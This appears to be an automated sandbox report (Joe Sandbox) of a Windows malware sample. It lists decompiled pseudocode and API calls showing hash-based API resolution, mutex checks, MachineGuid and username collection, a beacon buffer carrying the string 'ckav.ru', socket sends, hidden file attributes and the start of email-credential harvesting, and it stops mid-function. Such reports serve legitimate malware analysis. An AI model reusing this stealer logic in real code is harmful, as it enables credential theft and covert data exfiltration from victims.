                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$AllocCreateReadVirtual
                  • String ID: .tmp
                  • API String ID: 3585551309-2986845003
                  • Opcode ID: 5d1d4d951f80304f6d94bcc895186941c41d2b8036c26940b1497ba8efd0f773
                  • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                  • Opcode Fuzzy Hash: 5d1d4d951f80304f6d94bcc895186941c41d2b8036c26940b1497ba8efd0f773
                  • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 79%
                  			E00413866(void* __eflags) {
                  				short _v6;
                  				short _v8;
                  				short _v10;
                  				short _v12;
                  				short _v14;
                  				short _v16;
                  				short _v18;
                  				short _v20;
                  				short _v22;
                  				char _v24;
                  				short _v28;
                  				short _v30;
                  				short _v32;
                  				short _v34;
                  				short _v36;
                  				short _v38;
                  				short _v40;
                  				short _v42;
                  				short _v44;
                  				short _v46;
                  				char _v48;
                  				short _v52;
                  				short _v54;
                  				short _v56;
                  				short _v58;
                  				short _v60;
                  				short _v62;
                  				short _v64;
                  				short _v66;
                  				short _v68;
                  				short _v70;
                  				short _v72;
                  				short _v74;
                  				char _v76;
                  				void* __ebx;
                  				void* __edi;
                  				void* _t38;
                  				short _t43;
                  				short _t44;
                  				short _t45;
                  				short _t46;
                  				short _t47;
                  				short _t48;
                  				short _t50;
                  				short _t51;
                  				short _t52;
                  				short _t54;
                  				short _t55;
                  				intOrPtr* _t57;
                  				intOrPtr* _t59;
                  				intOrPtr* _t61;
                  				void* _t63;
                  				WCHAR* _t65;
                  				long _t68;
                  				void* _t75;
                  				short _t76;
                  				short _t78;
                  				short _t83;
                  				short _t84;
                  				short _t85;
                  
                  				E00402C6C(_t38);
                  				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
                  				SetErrorMode(3); // executed
                  				_t43 = 0x4f;
                  				_v76 = _t43;
                  				_t44 = 0x4c;
                  				_v74 = _t44;
                  				_t45 = 0x45;
                  				_v72 = _t45;
                  				_t46 = 0x41;
                  				_v70 = _t46;
                  				_t47 = 0x55;
                  				_v68 = _t47;
                  				_t48 = 0x54;
                  				_t76 = 0x33;
                  				_t84 = 0x32;
                  				_t83 = 0x2e;
                  				_t78 = 0x64;
                  				_t85 = 0x6c;
                  				_v66 = _t48;
                  				_v52 = 0;
                  				_t50 = 0x77;
                  				_v48 = _t50;
                  				_t51 = 0x73;
                  				_v46 = _t51;
                  				_t52 = 0x5f;
                  				_v42 = _t52;
                  				_v28 = 0;
                  				_t54 = 0x6f;
                  				_v24 = _t54;
                  				_t55 = 0x65;
                  				_v20 = _t55;
                  				_v64 = _t76;
                  				_v62 = _t84;
                  				_v60 = _t83;
                  				_v58 = _t78;
                  				_v56 = _t85;
                  				_v54 = _t85;
                  				_v44 = _t84;
                  				_v40 = _t76;
                  				_v38 = _t84;
                  				_v36 = _t83;
                  				_v34 = _t78;
                  				_v32 = _t85;
                  				_v30 = _t85;
                  				_v22 = _t85;
                  				_v18 = _t76;
                  				_v16 = _t84;
                  				_v14 = _t83;
                  				_v12 = _t78;
                  				_v10 = _t85;
                  				_v8 = _t85;
                  				_v6 = 0;
                  				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                  				 *_t57( &_v76);
                  				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                  				 *_t59( &_v48);
                  				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                  				_t81 =  &_v24;
                  				 *_t61( &_v24); // executed
                  				_t63 = E00414059(); // executed
                  				if(_t63 != 0) {
                  					_t65 = E00413D97(0);
                  					E004031E5(0, 0, 0xcf167df4, 0, 0);
                  					CreateMutexW(0, 1, _t65); // executed
                  					_t68 = GetLastError();
                  					_t92 = _t68 - 0xb7;
                  					if(_t68 == 0xb7) {
                  						E00413B81(0);
                  						_pop(_t81); // executed
                  					}
                  					E00413003(_t92); // executed
                  					E00412B2E(_t92); // executed
                  					E00412D31(_t81, _t84); // executed
                  					E00413B3F();
                  					E00413B81(0);
                  					 *0x49fdd0 = 1;
                  				}
                  				return 0;
                  			}
































































                  APIs
                  • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                  • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                  • GetLastError.KERNEL32 ref: 0041399E
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: Error$CreateLastModeMutex
                  • String ID:
                  • API String ID: 3448925889-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
                  				long _v8;
                  				void* _t7;
                  				long _t10;
                  				void* _t21;
                  				struct _OVERLAPPED* _t24;
                  
                  				_t14 = __ebx;
                  				_t24 = 0;
                  				_v8 = 0;
                  				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
                  				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
                  				_t21 = _t7;
                  				if(_t21 != 0xffffffff) {
                  					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
                  					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
                  					if(_t10 != 0xffffffff) {
                  						E004031E5(_t14, 0, 0xc148f916, 0, 0);
                  						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
                  						_t24 =  !=  ? 1 : 0;
                  					}
                  					E00403C40(_t21); // executed
                  				}
                  				return _t24;
                  			}









                  APIs
                  • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                  • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CreatePointerWrite
                  • String ID:
                  • API String ID: 3672724799-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 34%
                  			E00412D31(void* __ecx, void* __edi) {
                  				long _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				char _v24;
                  				char _v40;
                  				void* __ebx;
                  				intOrPtr* _t10;
                  				void* _t11;
                  				void* _t25;
                  				void* _t26;
                  				void* _t27;
                  				void* _t35;
                  				void* _t53;
                  				char* _t57;
                  				void* _t58;
                  				void* _t61;
                  				void* _t64;
                  				void* _t65;
                  				intOrPtr* _t66;
                  				void* _t67;
                  				void* _t68;
                  				void* _t69;
                  				void* _t70;
                  				void* _t71;
                  				void* _t72;
                  				void* _t73;
                  
                  				_t53 = __ecx;
                  				_t10 =  *0x49fde0;
                  				_t68 = _t67 - 0x24;
                  				 *0x49fddc = 0x927c0;
                  				 *0x49fde4 = 0;
                  				_t75 = _t10;
                  				if(_t10 != 0) {
                  					L16:
                  					_push(1);
                  					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
                  					_t61 = _t11;
                  					_t68 = _t68 + 0xc;
                  					if(_t61 != 0) {
                  						E004031E5(0, 0, 0xfcae4162, 0, 0);
                  						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
                  					}
                  					L004067C4(0xea60); // executed
                  					_pop(_t53);
                  				} else {
                  					_push(__edi);
                  					 *0x49fde0 = E004056BF(0x2bc);
                  					E00413DB7(_t53, _t75,  &_v40);
                  					_t57 =  &_v24;
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					E004058D4( *0x49fde0, 0x12);
                  					E004058D4( *0x49fde0, 0x28);
                  					E00405872( *0x49fde0, "ckav.ru", 0, 0);
                  					_t69 = _t68 + 0x28;
                  					_t64 = E0040632F();
                  					_push(0);
                  					_push(1);
                  					if(_t64 == 0) {
                  						_push(0);
                  						_push( *0x49fde0);
                  						E00405872();
                  						_t70 = _t69 + 0x10;
                  					} else {
                  						_push(_t64);
                  						_push( *0x49fde0);
                  						E00405872();
                  						E00402BAB(_t64);
                  						_t70 = _t69 + 0x14;
                  					}
                  					_t58 = E00406130(_t57);
                  					_push(0);
                  					_push(1);
                  					_t77 = _t64;
                  					if(_t64 == 0) {
                  						_push(0);
                  						_push( *0x49fde0);
                  						_t25 = E00405872();
                  						_t71 = _t70 + 0x10; // executed
                  					} else {
                  						_push(_t58);
                  						_push( *0x49fde0);
                  						E00405872();
                  						_t25 = E00402BAB(_t58);
                  						_t71 = _t70 + 0x14;
                  					}
                  					_t26 = E004061C3(_t25, 0, _t77); // executed
                  					_t65 = _t26;
                  					_push(0);
                  					_push(1);
                  					if(_t65 == 0) {
                  						_push(0);
                  						_push( *0x49fde0);
                  						_t27 = E00405872();
                  						_t72 = _t71 + 0x10;
                  					} else {
                  						_push(_t65);
                  						_push( *0x49fde0);
                  						E00405872();
                  						_t27 = E00402BAB(_t65);
                  						_t72 = _t71 + 0x14;
                  					}
                  					_t66 = E00406189(_t27);
                  					_t79 = _t66;
                  					if(_t66 == 0) {
                  						E00405781( *0x49fde0, 0);
                  						E00405781( *0x49fde0, 0);
                  						_t73 = _t72 + 0x10;
                  					} else {
                  						E00405781( *0x49fde0,  *_t66);
                  						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
                  						E00402BAB(_t66);
                  						_t73 = _t72 + 0x14;
                  					}
                  					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
                  					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
                  					_t35 = E0040642C(_t79); // executed
                  					E004058D4( *0x49fde0, _t35);
                  					E004058D4( *0x49fde0, _v24);
                  					E004058D4( *0x49fde0, _v20);
                  					E004058D4( *0x49fde0, _v16);
                  					E004058D4( *0x49fde0, _v12);
                  					E00405872( *0x49fde0, E00413D97(0), 1, 0);
                  					_t68 = _t73 + 0x48;
                  				}
                  				_t80 =  *0x49fde4;
                  				if( *0x49fde4 == 0) {
                  					_t10 =  *0x49fde0;
                  					goto L16;
                  				}
                  				return E00405695(_t53,  *0x49fde0);
                  			}































                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                    • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                    • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                    • Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$CreateFreeProcessThread_wmemset
                  • String ID: ckav.ru
                  • API String ID: 2915393847-2696028687
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040632F() {
                  				char _v8;
                  				void* _t4;
                  				void* _t7;
                  				void* _t16;
                  
                  				_t16 = E00402B7C(0x208);
                  				if(_t16 == 0) {
                  					L4:
                  					_t4 = 0;
                  				} else {
                  					E0040338C(_t16, 0, 0x104);
                  					_t1 =  &_v8; // 0x4143e8
                  					_v8 = 0x208;
                  					_t7 = E00406069(_t16, _t1); // executed
                  					if(_t7 == 0) {
                  						E00402BAB(_t16);
                  						goto L4;
                  					} else {
                  						_t4 = _t16;
                  					}
                  				}
                  				return _t4;
                  			}








                  APIs
                    • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                    • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                  • _wmemset.LIBCMT ref: 0040634F
                    • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser_wmemset
                  • String ID: CA
                  • API String ID: 2078537776-1052703068
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
                  				int _t7;
                  				void* _t8;
                  
                  				E004031E5(_t8, 9, 0xecae3497, 0, 0);
                  				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
                  				return _t7;
                  			}






                  APIs
                  • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: InformationToken
                  • String ID: IDA
                  • API String ID: 4114910276-365204570
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00402C03(struct HINSTANCE__* _a4, char _a8) {
                  				_Unknown_base(*)()* _t5;
                  				void* _t6;
                  
                  				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
                  				_t1 =  &_a8; // 0x403173
                  				_t5 = GetProcAddress(_a4,  *_t1); // executed
                  				return _t5;
                  			}






                  APIs
                  • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc
                  • String ID: s1@
                  • API String ID: 190572456-427247929
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 92%
                  			E00404A52(void* _a4, char* _a8, char* _a12) {
                  				void* _v8;
                  				int _v12;
                  				void* __ebx;
                  				char* _t10;
                  				long _t13;
                  				char* _t27;
                  
                  				_push(_t21);
                  				_t27 = E00402B7C(0x208);
                  				if(_t27 == 0) {
                  					L4:
                  					_t10 = 0;
                  				} else {
                  					E00402B4E(_t27, 0, 0x208);
                  					_v12 = 0x208;
                  					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
                  					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
                  					if(_t13 != 0) {
                  						E00402BAB(_t27);
                  						goto L4;
                  					} else {
                  						E004031E5(0, 9, 0xfe9f661a, 0, 0);
                  						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
                  						E00404A39(_v8); // executed
                  						_t10 = _t27;
                  					}
                  				}
                  				return _t10;
                  			}










                  APIs
                    • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                    • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                  • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                  • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateOpenProcessQueryValue
                  • String ID:
                  • API String ID: 1425999871-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00402BAB(void* _a4) {
                  				void* _t3;
                  				char _t5;
                  
                  				if(_a4 != 0) {
                  					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
                  					return _t5;
                  				}
                  				return _t3;
                  			}






                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                  • RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$FreeProcess
                  • String ID:
                  • API String ID: 3859560861-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 40%
                  			E004060BD(void* __eflags) {
                  				signed int _v8;
                  				char _v12;
                  				short _v16;
                  				char _v20;
                  				void* __ebx;
                  				intOrPtr* _t12;
                  				signed int _t13;
                  				intOrPtr* _t14;
                  				signed int _t15;
                  				void* _t24;
                  
                  				_v16 = 0x500;
                  				_v20 = 0;
                  				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
                  				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                  				_v8 = _t13;
                  				if(_t13 != 0) {
                  					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
                  					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
                  					asm("sbb eax, eax");
                  					_v8 = _v8 &  ~_t15;
                  					E0040604F(_v12);
                  					return _v8;
                  				}
                  				return _t13;
                  			}














                  APIs
                  • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: CheckMembershipToken
                  • String ID:
                  • API String ID: 1351025785-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
                  				void* _t3;
                  				int _t5;
                  
                  				_t3 = E00403D4D(__eflags, _a4); // executed
                  				if(_t3 == 0) {
                  					__eflags = 0;
                  					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
                  					_t5 = CreateDirectoryW(_a4, 0); // executed
                  					return _t5;
                  				} else {
                  					return 1;
                  				}
                  			}






                  APIs
                  • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateDirectory
                  • String ID:
                  • API String ID: 4241100979-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E0040642C(void* __eflags) {
                  				short _v40;
                  				intOrPtr* _t6;
                  				void* _t10;
                  
                  				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
                  				 *_t6( &_v40); // executed
                  				return 0 | _v40 == 0x00000009;
                  			}






                  APIs
                  • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

                  C-Code - Quality: 37%
                  			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                  				intOrPtr _t5;
                  
                  				_t5 = _a12;
                  				if(_t5 == 0) {
                  					_t5 = E00405D0B(_a8) + 1;
                  				}
                  				__imp__#19(_a4, _a8, _t5, 0); // executed
                  				return _t5;
                  			}




                  APIs
                  • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

                  C-Code - Quality: 100%
                  			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
                  				int _t6;
                  				void* _t7;
                  
                  				E004031E5(_t7, 0, 0xc9143177, 0, 0);
                  				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
                  				return _t6;
                  			}





                  APIs
                  • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

                  APIs
                  • WSAStartup.WS2_32(00000202,?), ref: 00404E08

                  C-Code - Quality: 100%
                  			E0040427D(WCHAR* _a4) {
                  				int _t4;
                  				void* _t5;
                  
                  				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
                  				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
                  				return _t4;
                  			}





                  APIs
                  • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

                  C-Code - Quality: 100%
                  			E00404A19(void* _a4, short* _a8, void** _a12) {
                  				long _t5;
                  				void* _t6;
                  
                  				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
                  				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
                  				return _t5;
                  			}





                  APIs
                  • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

                  C-Code - Quality: 100%
                  			E00403C40(void* _a4) {
                  				int _t4;
                  				void* _t5;
                  
                  				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
                  				_t4 = FindCloseChangeNotification(_a4); // executed
                  				return _t4;
                  			}





                  APIs
                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

                  C-Code - Quality: 100%
                  			E00403C08(WCHAR* _a4) {
                  				int _t4;
                  				void* _t5;
                  
                  				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
                  				_t4 = DeleteFileW(_a4); // executed
                  				return _t4;
                  			}





                  APIs
                  • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

                  C-Code - Quality: 100%
                  			E00402C1F(WCHAR* _a4) {
                  				struct HINSTANCE__* _t4;
                  				void* _t5;
                  
                  				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
                  				_t4 = LoadLibraryW(_a4); // executed
                  				return _t4;
                  			}





                  APIs
                  • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

                  C-Code - Quality: 100%
                  			E00403BEF(void* _a4) {
                  				int _t4;
                  				void* _t5;
                  
                  				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
                  				_t4 = FindClose(_a4); // executed
                  				return _t4;
                  			}





                  APIs
                  • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

                  C-Code - Quality: 100%
                  			E00403BB7(WCHAR* _a4) {
                  				long _t4;
                  				void* _t5;
                  
                  				E004031E5(_t5, 0, 0xc6808176, 0, 0);
                  				_t4 = GetFileAttributesW(_a4); // executed
                  				return _t4;
                  			}





                  APIs
                  • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

                  C-Code - Quality: 100%
                  			E004049FF(void* _a4) {
                  				long _t3;
                  				void* _t4;
                  
                  				E004031E5(_t4, 9, 0xd980e875, 0, 0);
                  				_t3 = RegCloseKey(_a4); // executed
                  				return _t3;
                  			}





                  APIs
                  • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

                  C-Code - Quality: 100%
                  			E00403B64(WCHAR* _a4) {
                  				int _t3;
                  				void* _t4;
                  
                  				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
                  				_t3 = PathFileExistsW(_a4); // executed
                  				return _t3;
                  			}





                  APIs
                  • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

                  APIs
                  • closesocket.WS2_32(00404EB0), ref: 00404DEB

                  C-Code - Quality: 100%
                  			E00403F9E(void* _a4) {
                  				int _t3;
                  				void* _t4;
                  
                  				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
                  				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
                  				return _t3;
                  			}





                  APIs
                  • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

                  C-Code - Quality: 100%
                  			E00406472(long _a4) {
                  				void* _t3;
                  				void* _t4;
                  
                  				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
                  				Sleep(_a4); // executed
                  				return _t3;
                  			}





                  APIs
                  • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

                  C-Code - Quality: 100%
                  			E004058EA(char* _a4, char* _a8) {
                  				char* _t4;
                  				void* _t5;
                  
                  				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
                  				_t4 = StrStrA(_a4, _a8); // executed
                  				return _t4;
                  			}





                  APIs
                  • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

                  C-Code - Quality: 100%
                  			E00405924(WCHAR* _a4, WCHAR* _a8) {
                  				WCHAR* _t4;
                  				void* _t5;
                  
                  				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
                  				_t4 = StrStrW(_a4, _a8); // executed
                  				return _t4;
                  			}





                  APIs
                  • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

                  C-Code - Quality: 88%
                  			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
                  				signed int _v8;
                  				signed int _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				void* __edi;
                  				void* __esi;
                  				intOrPtr _t40;
                  				intOrPtr _t45;
                  				intOrPtr _t47;
                  				void* _t71;
                  				void* _t75;
                  				void* _t77;
                  
                  				_t72 = _a4;
                  				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
                  				_t81 = _t71;
                  				if(_t71 != 0) {
                  					_push(__ebx);
                  					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
